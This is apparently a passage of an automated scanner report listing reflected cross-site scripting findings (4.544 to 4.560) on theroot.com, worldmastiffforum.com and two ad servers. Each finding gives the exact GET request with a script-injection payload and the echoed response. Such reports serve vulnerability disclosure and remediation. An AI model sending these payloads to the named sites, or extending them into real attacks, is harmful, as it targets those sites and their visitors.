4.544. http://www.theroot.com/multimedia/50-years-black-history [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/multimedia/50-years-black-history

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b633c"><script>alert(1)</script>497fa5bdff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /multimedia/50-years-black-history?gt1=38002&b633c"><script>alert(1)</script>497fa5bdff4=1 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:54 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:56 GMT
Date: Wed, 02 Feb 2011 16:17:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 96334

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/multimedia/50-years-black-history?gt1=38002&b633c"><script>alert(1)</script>497fa5bdff4=1"/>
...[SNIP]...

4.545. http://www.theroot.com/views/2011/young-futurists [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2bdb"><script>alert(1)</script>5626f52969 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewsb2bdb"><script>alert(1)</script>5626f52969/2011/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:57 GMT
Date: Wed, 02 Feb 2011 16:17:57 GMT
Content-Length: 15066
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/viewsb2bdb"><script>alert(1)</script>5626f52969/2011/young-futurists?gt1=38002"/>
...[SNIP]...

4.546. http://www.theroot.com/views/2011/young-futurists [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1745"%3bfde0c798c36 was submitted in the REST URL parameter 2. This input was echoed as e1745";fde0c798c36 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /views/2011e1745"%3bfde0c798c36/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:03 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:05 GMT
Date: Wed, 02 Feb 2011 16:18:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49473

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
5="";
o_prop6="";
o_prop7="";
o_prop8="";
o_prop9="";
o_prop10="";
o_prop11="";
o_prop12="0";
o_prop13="-0";
o_prop14="";
o_prop19="";
o_prop21="";
o_prop25="";
o_prop32="drupal";
o_hier1="views | 2011e1745";fde0c798c36 | front";
o_hier2="theroot.com | views | 2011e1745";fde0c798c36 | front";
o_campaign="";
o_state="";
o_zip="";
o_events="";
o_products="";
o_purchaseID="";
o_eVar1="";
o_eVar2="";
o_eVar3="";
o_eVar4=
...[SNIP]...

4.547. http://www.theroot.com/views/2011/young-futurists [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 15823"><script>alert(1)</script>9152561effe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/201115823"><script>alert(1)</script>9152561effe/young-futurists?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:59 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:01 GMT
Date: Wed, 02 Feb 2011 16:18:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49685

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/201115823"><script>alert(1)</script>9152561effe/young-futurists?gt1=38002"/>
...[SNIP]...

4.548. http://www.theroot.com/views/2011/young-futurists [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1903c"><script>alert(1)</script>6042e8de7d9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/2011/young-futurists1903c"><script>alert(1)</script>6042e8de7d9?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:13 GMT
Date: Wed, 02 Feb 2011 16:18:13 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49637

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists1903c"><script>alert(1)</script>6042e8de7d9?gt1=38002"/>
...[SNIP]...

4.549. http://www.theroot.com/views/2011/young-futurists [gt1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9263e"><script>alert(1)</script>7ef5e7e7b85 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/2011/young-futurists?gt1=380029263e"><script>alert(1)</script>7ef5e7e7b85 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:50 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:51 GMT
Date: Wed, 02 Feb 2011 16:17:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists?gt1=380029263e"><script>alert(1)</script>7ef5e7e7b85"/>
...[SNIP]...

4.550. http://www.theroot.com/views/2011/young-futurists [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/2011/young-futurists

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cfba"><script>alert(1)</script>c2fd8dd267f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/2011/young-futurists?gt1=38002&1cfba"><script>alert(1)</script>c2fd8dd267f=1 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:55 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:56 GMT
Date: Wed, 02 Feb 2011 16:17:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 62067

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/2011/young-futurists?gt1=38002&1cfba"><script>alert(1)</script>c2fd8dd267f=1"/>
...[SNIP]...

4.551. http://www.theroot.com/views/meet-25-people-who-will-change-our-world [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload daeb9"><script>alert(1)</script>f3e0aacca45 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /viewsdaeb9"><script>alert(1)</script>f3e0aacca45/meet-25-people-who-will-change-our-world?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:57 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:57 GMT
Date: Wed, 02 Feb 2011 16:17:57 GMT
Content-Length: 15186
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/viewsdaeb9"><script>alert(1)</script>f3e0aacca45/meet-25-people-who-will-change-our-world?gt1=38002"/>
...[SNIP]...

4.552. http://www.theroot.com/views/meet-25-people-who-will-change-our-world [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f68f"%3b6502cd69799 was submitted in the REST URL parameter 2. This input was echoed as 1f68f";6502cd69799 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /views/meet-25-people-who-will-change-our-world1f68f"%3b6502cd69799?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:08 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:10 GMT
Date: Wed, 02 Feb 2011 16:18:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49659

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
8="";
o_prop9="";
o_prop10="";
o_prop11="";
o_prop12="0";
o_prop13="-0";
o_prop14="";
o_prop19="";
o_prop21="";
o_prop25="";
o_prop32="drupal";
o_hier1="views | meet-25-people-who-will-change-our-world1f68f";6502cd69799 | front";
o_hier2="theroot.com | views | meet-25-people-who-will-change-our-world1f68f";6502cd69799 | front";
o_campaign="";
o_state="";
o_zip="";
o_events="";
o_products="";
o_purchaseID="";
o_eVar1=
...[SNIP]...

4.553. http://www.theroot.com/views/meet-25-people-who-will-change-our-world [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 648c7"><script>alert(1)</script>e0cb09e666d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/meet-25-people-who-will-change-our-world648c7"><script>alert(1)</script>e0cb09e666d?gt1=38002 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:18:05 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:18:06 GMT
Date: Wed, 02 Feb 2011 16:18:06 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 49871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world648c7"><script>alert(1)</script>e0cb09e666d?gt1=38002"/>
...[SNIP]...

4.554. http://www.theroot.com/views/meet-25-people-who-will-change-our-world [gt1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The value of the gt1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4e7c"><script>alert(1)</script>6bc14871c67 was submitted in the gt1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/meet-25-people-who-will-change-our-world?gt1=38002e4e7c"><script>alert(1)</script>6bc14871c67 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:48 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:49 GMT
Date: Wed, 02 Feb 2011 16:17:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 65972

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002e4e7c"><script>alert(1)</script>6bc14871c67"/>
...[SNIP]...

4.555. http://www.theroot.com/views/meet-25-people-who-will-change-our-world [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.theroot.com
Path:	/views/meet-25-people-who-will-change-our-world

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1b4be"><script>alert(1)</script>542e90bad81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /views/meet-25-people-who-will-change-our-world?gt1=38002&1b4be"><script>alert(1)</script>542e90bad81=1 HTTP/1.1
Host: www.theroot.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 02 Feb 2011 16:17:52 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Wed, 02 Feb 2011 16:17:54 GMT
Date: Wed, 02 Feb 2011 16:17:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 66003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<meta name="
...[SNIP]...
<meta property="og:url" content="http://www.theroot.com/views/meet-25-people-who-will-change-our-world?gt1=38002&1b4be"><script>alert(1)</script>542e90bad81=1"/>
...[SNIP]...

4.556. http://www.worldmastiffforum.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.worldmastiffforum.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d11e2"><script>alert(1)</script>f6a009cb502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?d11e2"><script>alert(1)</script>f6a009cb502=1 HTTP/1.1
Host: www.worldmastiffforum.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Thu, 03 Feb 2011 04:07:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: hascookies=1; path=/; domain=.worldmastiffforum.com;
Expires: Nov, 8 1991 00:00:01 GMT
Cache-control: no-cache
P3P: CP='NOI DSP COR NID CURa TAIi OUR BUS INT PRE'; policyref='http://www.worldmastiffforum.com/w3c/p3p.xml';
Set-Cookie: newvisit=1296706072; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Set-Cookie: lastvisit=1296706072; path=/; domain=.worldmastiffforum.com; expires=Wed, 25-Aug-2020 00:00:00 GMT;
Vary: Accept-Encoding
Content-Length: 74271

       <html >
       <head>
       <link rel="alternate" type="application/rss+xml" title="Message Board RSS Feed" href="/external">

           <link rel="alternate" type="application/rss+xml" title="Message Board - -
...[SNIP]...
<input type="hidden" name="jump" value="http://www.worldmastiffforum.com/?d11e2"><script>alert(1)</script>f6a009cb502=1">
...[SNIP]...

4.557. http://ad.harrenmedianetwork.com/imp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ffdd'-alert(1)-'44731edd2a4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /imp?Z=160x600&s=429613&_salt=975924496&B=10&u=http%3A%2F%2Fad.harrenmedianetwork.com%2F&r=0 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=5ffdd'-alert(1)-'44731edd2a4

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:59 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:17:59 GMT
Content-Length: 522
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&referrer=http://www.google.com/search%3Fhl=en%26q=5ffdd'-alert(1)-'44731edd2a4&inv_code=429613&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D160x600%26s%3D429613%26_salt%3D975924496%26B%3D10%26u%3Dhttp%253A%252F%252Fad.harrenme
...[SNIP]...

4.558. http://ad.harrenmedianetwork.com/st [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.harrenmedianetwork.com
Path:	/st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a72ed'-alert(1)-'fb8e70772e6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=160x600&section=429613 HTTP/1.1
Host: ad.harrenmedianetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=a72ed'-alert(1)-'fb8e70772e6

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:17:55 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:17:55 GMT
Content-Length: 600
Connection: close

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=634&size=160x600&inv_code=429613&referrer=http://www.google.com/search%3Fhl=en%26q=a72ed'-alert(1)-'fb8e70772e6&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D634%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D160x600%26section%3D429613">
...[SNIP]...

4.559. http://ad.scanmedios.com/imp [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/imp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e7bea'-alert(1)-'540c8b7b243 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /imp?Z=300x250&s=601669&_salt=1358407199&B=10&u=http%3A%2F%2Fad.scanmedios.com%2F&r=0 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e7bea'-alert(1)-'540c8b7b243

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:03 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Wed, 02 Feb 2011 19:18:03 GMT
Content-Length: 515
Connection: close

document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=319&size=300x250&referrer=http://www.google.com/search%3Fhl=en%26q=e7bea'-alert(1)-'540c8b7b243&inv_code=601669&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D319%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D601669%26_salt%3D1358407199%26B%3D10%26u%3Dhttp%253A%252F%252Fad.scanmed
...[SNIP]...

4.560. http://ad.scanmedios.com/st [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://ad.scanmedios.com
Path:	/st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 11978'-alert(1)-'712c5dc792d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /st?ad_type=iframe&ad_size=300x250&section=601669 HTTP/1.1
Host: ad.scanmedios.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=11978'-alert(1)-'712c5dc792d

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 03-Feb-2011 19:18:01 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Wed, 02 Feb 2011 19:18:01 GMT
Content-Length: 600
Connection: close

